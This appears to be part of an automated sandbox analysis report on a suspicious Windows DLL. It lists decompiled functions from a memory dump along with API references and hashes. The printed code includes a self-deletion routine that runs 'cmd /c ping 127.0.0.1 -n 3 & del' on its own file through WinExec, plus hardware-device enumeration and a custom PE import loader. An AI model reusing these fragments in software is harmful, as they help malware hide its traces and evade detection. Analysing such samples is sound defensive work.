Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
String ID:
API String ID: 2870529951-0
Opcode ID: fc94a89f3ef1200f27781975550bb89b68149c34957b6fa54f9fd08f5d5b4d7a
Instruction ID: 8b665d2d90db9d313c13c33d8a46f5d936d5b37bcfbd2c7c3b96e787307a2e84
Opcode Fuzzy Hash: fc94a89f3ef1200f27781975550bb89b68149c34957b6fa54f9fd08f5d5b4d7a
Instruction Fuzzy Hash: 4731C875A043518FF350DFB58DC161A37E8FF49381F228429E909DB256EB30EC818B51

Uniqueness

Uniqueness Score: -1.00%

Function 1001A2C0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A2C0() {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF80(_t20,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF80(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);
				E1000CCA3(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
				_t15 = WinExec( &_v268, 0); // executed
				return _t15;
			}

0x1001a2c9
0x1001a2de
0x1001a2e6
0x1001a2fb
0x1001a311
0x1001a32a
0x1001a33b
0x1001a344

APIs

_memset.LIBCMT ref: 1001A2DE
_memset.LIBCMT ref: 1001A2FB
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A311
_sprintf.LIBCMT ref: 1001A32A
WinExec.KERNEL32 ref: 1001A33B

Strings

cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A31E

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$ExecFileModuleName_sprintf
String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
API String ID: 2874319085-10483710
Opcode ID: f420551fc850474c97d40147a8eae288538b5e405040515d23e53dac240480c4
Instruction ID: dfe06c4bab66860014fe570f5f0bb2c2abbb8c4bd71063b777625ae051172b46
Opcode Fuzzy Hash: f420551fc850474c97d40147a8eae288538b5e405040515d23e53dac240480c4
Instruction Fuzzy Hash: A9F04F7998431C66E720D760EC8AFE9773CAB24704F4405D4F6986A1C5EEF467CC8BA2

Uniqueness

Uniqueness Score: -1.00%

Function 1001A660, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001A660(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;
				char _v335;
				char _v336;
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t71 = __edi;
				_push(0xffffffff);
				_push(E1002315C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10025ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF80(__edi,  &_v335, 0, 0x103);
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A1D0( &_v336); // executed
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CCA3(_t71,  &_v72, "%d", _v24);
				_v20 = E1001A4E0(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
				_t81 = _v20;
				if(_v20 != 0) {
					E10001AB0( &_v52, _t81, _v20);
					E10001AB0( &_v52, _t81, ".exe");
					_push(_v20);
					E1000CA40(__ebx, _t71, __esi, _t81);
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {
					E10001AB0( &_v52, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);
				 *[fs:0x0] = _v16;
				return _a4;
			}

APIs

_memset.LIBCMT ref: 1001A6B1
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7

Part of subcall function 1001A1D0: FindFirstFileA.KERNEL32(1001A6D9,?), ref: 1001A1EE
Part of subcall function 1001A1D0: FindClose.KERNEL32(000000FF), ref: 1001A216

_sprintf.LIBCMT ref: 1001A705

Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616

Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

Strings

.exe, xrefs: 1001A72E
baidu.exe, xrefs: 1001A753

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
String ID: .exe$baidu.exe
API String ID: 3164538923-2273953317
Opcode ID: 08d08622395ad553d42a9c19a3d1865530d992bc95af371e2ab3d3718ce9d517
Instruction ID: e55bd592b59adb37ad85060a3931d0354643b17087754827cff962c307c3447c
Opcode Fuzzy Hash: 08d08622395ad553d42a9c19a3d1865530d992bc95af371e2ab3d3718ce9d517
Instruction Fuzzy Hash: 56315BB5C10258ABEB04DBA0ED85FEEB7B4FF09740F400169F519A6281EB746A48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100199C0, Relevance: 7.7, APIs: 5, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E100199C0(void* __ebx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v312;
				char _v572;
				char _v832;
				char _v1092;
				char _v1352;
				char _v1368;
				char _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				signed int _v1384;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t74;
				intOrPtr _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t97;
				void* _t116;
				signed int _t150;
				void* _t164;
				void* _t168;
				void* _t171;
				void* _t174;
				void* _t177;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				intOrPtr _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t202;
				void* _t203;

				_t116 = __ebx;
				 *[fs:0x0] = _t187;
				_t188 = _t187 - 0x558;
				_v1384 = 0;
				_t74 = E100031F0( &_v1368, __eflags);
				_v8 = 0;
				_v1376 = 0;
				_v48 = 0;
				_v1372 = 0;
				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E1002314A, 0xffffffff); // executed
				_v1380 = _t74;
				if(_v1380 != 0xffffffff) {
					E1000CF80(_t164,  &_v44, 0, 0x1c);
					_t189 = _t188 + 0xc;
					_v44 = 0x1c;
					while(1) {
						_t148 = _v1376;
						_t80 = _v1380;
						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
						if(_t80 == 0) {
							break;
						}
						E1000CF80(_t164,  &_v1352, 0, 0x514);
						_push( &_v1372);
						_push( &_v48);
						_push(0);
						_t191 = _t189 + 0xc - 0x1c;
						_t182 =  &_v44;
						memcpy(_t191, _t182, 7 << 2);
						_t168 = _t182 + 0xe;
						_push(_v1380); // executed
						_t85 = E100197E0(_t116, _t182); // executed
						_t193 = _t191 + 0x38;
						_t213 = _t85;
						if(_t85 != 0) {
							E1000D1F0(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t168, _t182, _t213);
							_t193 = _t193 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(7);
						_t194 = _t193 - 0x1c;
						_t183 =  &_v44;
						memcpy(_t194, _t183, 7 << 2);
						_t171 = _t183 + 0xe;
						_push(_v1380); // executed
						_t88 = E100197E0(_t116, _t183); // executed
						_t196 = _t194 + 0x38;
						_t214 = _t88;
						if(_t88 != 0) {
							E1000D1F0(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t171, _t183, _t214);
							_t196 = _t196 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0x16);
						_t197 = _t196 - 0x1c;
						_t184 =  &_v44;
						memcpy(_t197, _t184, 7 << 2);
						_t174 = _t184 + 0xe;
						_push(_v1380); // executed
						_t91 = E100197E0(_t116, _t184); // executed
						_t199 = _t197 + 0x38;
						_t215 = _t91;
						if(_t91 != 0) {
							E1000D1F0(_t116, _t174, _t184,  &_v832, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t174, _t184, _t215);
							_t199 = _t199 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0xc);
						_t200 = _t199 - 0x1c;
						_t185 =  &_v44;
						memcpy(_t200, _t185, 7 << 2);
						_t177 = _t185 + 0xe;
						_push(_v1380); // executed
						_t94 = E100197E0(_t116, _t185); // executed
						_t202 = _t200 + 0x38;
						_t216 = _t94;
						if(_t94 != 0) {
							E1000D1F0(_t116, _t177, _t185,  &_v572, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t177, _t185, _t216);
							_t202 = _t202 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(8);
						_t203 = _t202 - 0x1c;
						_t186 =  &_v44;
						memcpy(_t203, _t186, 7 << 2);
						_t164 = _t186 + 0xe;
						_push(_v1380); // executed
						_t97 = E100197E0(_t116, _t186); // executed
						_t189 = _t203 + 0x38;
						_t217 = _t97;
						if(_t97 != 0) {
							E1000D1F0(_t116, _t164, _t186,  &_v312, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t164, _t186, _t217);
							_t189 = _t189 + 0x10;
						}
						_v1376 = _v1376 + 1;
						E10003390( &_v1368,  &_v1352, _t217,  &_v1352);
					}
					__imp__SetupDiDestroyDeviceInfoList(_v1380); // executed
				}
				E10003220(_a4, _t148, __eflags,  &_v1368);
				_t150 = _v1384 | 0x00000001;
				__eflags = _t150;
				_v1384 = _t150;
				_v8 = 0xffffffff;
				E10003300( &_v1368); // executed
				 *[fs:0x0] = _v16;
				return _a4;
			}

APIs

SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 10019A1F
_memset.LIBCMT ref: 10019A40
SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A61
_memset.LIBCMT ref: 10019A7D

Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
Part of subcall function 100197E0: GetLastError.KERNEL32 ref: 10019812
Part of subcall function 100197E0: _memset.LIBCMT ref: 1001983E
Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864

Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019C5B

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
String ID:
API String ID: 3323326763-0
Opcode ID: f8c89a6727fd7a968aa7c8f84d6bdcaed2ad53855714dbc5a262361878d3537d
Instruction ID: feca0670d641fe6b0cb65ea07884cbe10e98eaee29bba7d3bd3bbacfe8845874
Opcode Fuzzy Hash: f8c89a6727fd7a968aa7c8f84d6bdcaed2ad53855714dbc5a262361878d3537d
Instruction Fuzzy Hash: 6C81A5B6D006189BDB14DBA8DC51FEF7378EB48315F048198E509B7281EB35AA85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001ABC0, Relevance: 7.7, APIs: 5, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E1001ABC0(intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				signed int* _v32;
				void* _v36;
				intOrPtr _v40;
				void* __ebp;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t122;
				void* _t130;
				void _t132;
				void _t137;
				void* _t144;
				void* _t159;
				void* _t194;
				void* _t201;
				void* _t202;
				void* _t203;
				void* _t204;

				_t2 = _a4 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(1) {
						_t108 = IsBadReadPtr(_v8, 0x14);
						__eflags = _t108;
						if(_t108 != 0) {
							break;
						}
						_t110 = _v8;
						__eflags =  *(_t110 + 0xc);
						if( *(_t110 + 0xc) == 0) {
							break;
						}
						_t18 = _a4 + 0x34; // 0x118bb84d
						_t23 = _a4 + 0x24; // 0xf3c7e850, executed
						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18); // executed
						_t204 = _t203 + 8;
						_v36 = _t113;
						__eflags = _v36;
						if(__eflags != 0) {
							_t28 = _a4 + 0xc; // 0x52b8558b
							_push(4 +  *_t28 * 4);
							_t32 = _a4 + 8; // 0x98
							_push( *_t32);
							_t115 = E1000E078(_t144,  *_t32, _t201, _t202, __eflags);
							_t203 = _t204 + 8;
							_v28 = _t115;
							__eflags = _v28;
							if(_v28 != 0) {
								 *(_a4 + 8) = _v28;
								_t45 = _a4 + 0xc; // 0x52b8558b
								_t47 = _a4 + 8; // 0x98
								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
								_t52 = _a4 + 0xc; // 0x52b8558b
								 *(_a4 + 0xc) =  *_t52 + 1;
								__eflags =  *_v8;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									__eflags = _t122;
									_v24 = _t122;
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while(1) {
									__eflags =  *_v32;
									if( *_v32 == 0) {
										break;
									}
									__eflags =  *_v32 & 0x80000000;
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t88 = _a4 + 0x34; // 0x118bb84d
										_t130 = _v40 + 2;
										__eflags = _t130;
										_t92 = _a4 + 0x28; // 0xc483ffff
										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
										_t203 = _t203 + 0xc;
										 *_v24 = _t132;
									} else {
										_t78 = _a4 + 0x34; // 0x118bb84d
										_t82 = _a4 + 0x28; // 0xc483ffff
										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
										_t203 = _t203 + 0xc;
										 *_v24 = _t137;
									}
									__eflags =  *_v24;
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_t194 = _v24 + 4;
										__eflags = _t194;
										_v24 = _t194;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t159 = _v8 + 0x14;
									__eflags = _t159;
									_v8 = _t159;
									continue;
								}
								_t98 = _a4 + 0x34; // 0x118bb84d
								_t101 = _a4 + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
								SetLastError(0x7f);
								break;
							}
							_t36 = _a4 + 0x34; // 0x118bb84d
							_t39 = _a4 + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}

APIs

IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001AC12
SetLastError.KERNEL32(0000007E), ref: 1001AC54

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
Instruction ID: 7fa1d4eba7a4407511cddb994e7de49554f5151831751da13495a7fdaa87bcf2
Opcode Fuzzy Hash: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
Instruction Fuzzy Hash: 8B81A374A00209EFDB04CF94D981AAEB7F1FF89355F248158E919AB351C735EA82CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000C9F5, Relevance: 6.1, APIs: 4, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E1000C9F5(signed char __eax, void* __ebx, void* __ecx, signed char __edx, void* __edi) {
				signed char _t12;
				intOrPtr* _t20;
				intOrPtr _t23;
				signed char _t37;
				intOrPtr _t40;
				signed int _t42;

				_t36 = __edx;
				_t11 = __eax;
				do {
					 *_t11 =  *_t11 + _t36;
					asm("rol dh, 1");
					 *_t11 =  *_t11 + _t36;
					_t12 = _t11 ^ 0x000000ba;
					 *_t12 =  *_t12 + _t36;
					asm("adc al, 0xbe");
					 *_t12 =  *_t12 + _t36;
					_t37 = _t36 & _t12;
					 *_t12 =  *_t12 + _t37;
					 *_t12 = 0x10;
					asm("movsd");
					 *_t12 =  *_t12 + _t37;
					asm("rol dword [eax], 0x10");
					_t36 = 0xc5;
					 *0xbd851000 =  *0xbd851000 + 0xc5;
					_push(ss);
					 *0xbd851000 =  *0xbd851000 + 0xc5;
					 *0xFFFFFFFF7A7B2000 =  *((intOrPtr*)(0xffffffff7a7b2000)) + 0xc5;
					 *(0xffffffff7a7b2000 & _t42) =  *(0xffffffff7a7b2000 & _t42) + 0xc5;
					_t11 = 0xbc671000;
					 *0xbc671000 =  *0xbc671000 + 0xc5;
				} while ( *0xbc671000 >= 0);
				 *0xbc671000 =  *0xbc671000 + 0xc5;
				asm("les eax, [eax]");
				asm("adc [edx+0xc], ch");
				_push(0xc);
				_push(0x103315c0);
				_t18 = E10010594(0xbc671000, __edi, 0xc2af1000);
				_t40 =  *((intOrPtr*)(_t42 + 8));
				if(_t40 != 0) {
					if( *0x10337f3c != 3) {
						_push(_t40);
						goto L10;
					} else {
						L1000FA63(4);
						 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
						_t23 = E1000FADC(_t40);
						 *((intOrPtr*)(_t42 - 0x1c)) = _t23;
						if(_t23 != 0) {
							_push(_t40);
							_push(_t23);
							E1000FB07();
						}
						 *(_t42 - 4) = 0xfffffffe;
						_t18 = E1000CA96();
						if( *((intOrPtr*)(_t42 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t42 + 8)));
							L10:
							_push(0);
							_t18 = RtlFreeHeap( *0x10335310); // executed
							_t48 = _t18;
							if(_t18 == 0) {
								_t20 = E1000F780(_t48);
								 *_t20 = E1000F745(GetLastError());
							}
						}
					}
				}
				return E100105D9(_t18);
			}

0x1000c9f5
0x1000c9f5
0x1000c9fa
0x1000c9fa
0x1000c9fc
0x1000c9fe
0x1000ca00
0x1000ca02
0x1000ca04
0x1000ca06
0x1000ca08
0x1000ca0a
0x1000ca0d
0x1000ca10
0x1000ca16
0x1000ca19
0x1000ca1c
0x1000ca1e
0x1000ca20
0x1000ca26
0x1000ca2a
0x1000ca2e
0x1000ca31
0x1000ca36
0x1000ca36
0x1000ca3a
0x1000ca3d
0x1000ca3f
0x1000ca40
0x1000ca42
0x1000ca47
0x1000ca4c
0x1000ca51
0x1000ca5a
0x1000ca9f
0x00000000
0x1000ca5c
0x1000ca5e
0x1000ca64
0x1000ca69
0x1000ca6f
0x1000ca74
0x1000ca76
0x1000ca77
0x1000ca78
0x1000ca7e
0x1000ca7f
0x1000ca86
0x1000ca8f
0x1000ca91
0x1000caa0
0x1000caa0
0x1000caa8
0x1000caae
0x1000cab0
0x1000cab2
0x1000cac5
0x1000cac7
0x1000cab0
0x1000ca8f
0x1000ca5a
0x1000cacd

APIs

___sbh_find_block.LIBCMT ref: 1000CA69
___sbh_free_block.LIBCMT ref: 1000CA78
RtlFreeHeap.NTDLL(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
String ID:
API String ID: 2661975262-0
Opcode ID: 3bef494b8fa5bc0c0bfd4821817cd3570d592744cb6803e220000cb7805236df
Instruction ID: 200fe6de2411e5f3ceebb4e29ace5decc6a6fb01bbe72e299d0e2431d26b974a
Opcode Fuzzy Hash: 3bef494b8fa5bc0c0bfd4821817cd3570d592744cb6803e220000cb7805236df
Instruction Fuzzy Hash: EC21F17AA0D3895FEB03CB704C85A893F60DF072D5F0A00DAE0449B1E7EA748D09CB52

Uniqueness

Uniqueness Score: -1.00%

Function 100197E0, Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E100197E0(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
				char _v8;
				char _v12;
				void* _t45;

				_v8 = 0;
				_v12 = 0;
				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44); // executed
				if(GetLastError() == 0x7a) {
					 *_a40 = L1000CEAF(__ebx, _a44, _t45, __esi,  *_a44);
					E1000CF80(_t45,  *_a40, 0,  *_a44);
					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0); // executed
					_v8 = 1;
				}
				return _v8;
			}

0x100197e6
0x100197ed
0x1001980c
0x1001981b
0x1001982e
0x1001983e
0x10019864
0x1001986a
0x1001986a
0x10019877

APIs

SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
GetLastError.KERNEL32 ref: 10019812
_memset.LIBCMT ref: 1001983E
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: DevicePropertyRegistrySetup$ErrorLast_memset
String ID:
API String ID: 895502402-0
Opcode ID: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
Instruction ID: 24f19bb5529a22c6d1e928f7077b1b8c164a3afe4c2a2c0ecea0b5371702a92b
Opcode Fuzzy Hash: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
Instruction Fuzzy Hash: EA11C6B9610208ABDB04CF94C8D5FDA77B9AB48304F118259F9099B280DA31EA85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA40, Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E1000CA40(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x103315c0);
				_t8 = E10010594(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E100105D9(_t8);
				}
				if( *0x10337f3c != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x10335310); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000F780(_t31);
						 *_t10 = E1000F745(GetLastError());
					}
					goto L9;
				}
				L1000FA63(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1000FADC(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1000FB07();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1000CA96();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x1000ca40
0x1000ca42
0x1000ca47
0x1000ca4c
0x1000ca51
0x1000cac8
0x1000cacd
0x1000cacd
0x1000ca5a
0x1000ca9f
0x1000caa0
0x1000caa0
0x1000caa8
0x1000caae
0x1000cab0
0x1000cab2
0x1000cac5
0x1000cac7
0x00000000
0x1000cab0
0x1000ca5e
0x1000ca64
0x1000ca69
0x1000ca6f
0x1000ca74
0x1000ca76
0x1000ca77
0x1000ca78
0x1000ca7e
0x1000ca7f
0x1000ca86
0x1000ca8f
0x00000000
0x1000ca91
0x1000ca91
0x00000000
0x1000ca91

APIs

___sbh_find_block.LIBCMT ref: 1000CA69
___sbh_free_block.LIBCMT ref: 1000CA78
RtlFreeHeap.NTDLL(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
